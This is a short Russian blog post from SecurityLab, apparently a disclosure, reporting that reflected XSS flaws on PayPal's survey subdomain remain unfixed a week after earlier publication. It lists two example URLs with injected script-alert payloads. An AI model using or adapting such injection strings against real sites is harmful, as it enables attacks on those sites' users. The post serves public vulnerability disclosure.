XSS в PayPal (попытка №2)

XSS в PayPal (попытка №2)
На прошлой неделе SecurityLab опубликовал новость о наличии XSS уязвимостей в PayPal. Неделю спустя исправлена только та уязвимость, на которую была прямая ссылка :). Все остальные до сих пор не исправлены. Примеры:

surveyc.paypal.com/dat.php?m=1>"><script>alert('www.securitylab.ru')</script>&c=0&pg=1

surveyc.paypal.com/login/?target=/rep.php%3Fm%3D2%26c%3D0%26pg%3D7"><script>alert('www.securitylab.ru')</script>&explanation=1

PS. Классная у них безопасность!
Security
Alt text
Обращаем внимание, что все материалы в этом блоге представляют личное мнение их авторов. Редакция SecurityLab.ru не несет ответственности за точность, полноту и достоверность опубликованных данных. Вся информация предоставлена «как есть» и может не соответствовать официальной позиции компании.
апреля
10:00 MSK
ПРО
конференция · москва · 22 апреля
Про ИБ без воды 2026:
практика от практиков
22 апреля в Москве «СёрчИнформ» проведет бесплатную межотраслевую конференцию для ИБ-директоров.
Зарегистрироваться
Реклама. 18+. Рекламодатель ООО «СёрчИнформ», ИНН 7704306397

Валерий Марчук

Блог посвящен безопасности и жизни секлаба

FREE
100%
Кибербезопасность · Обучение
УЧИСЬ!
ИЛИ
ВЗЛОМАЮТ
Лучшие ИБ-мероприятия
и вебинары — в одном месте
ПОДПИШИСЬ
T.ME/SECWEBINARS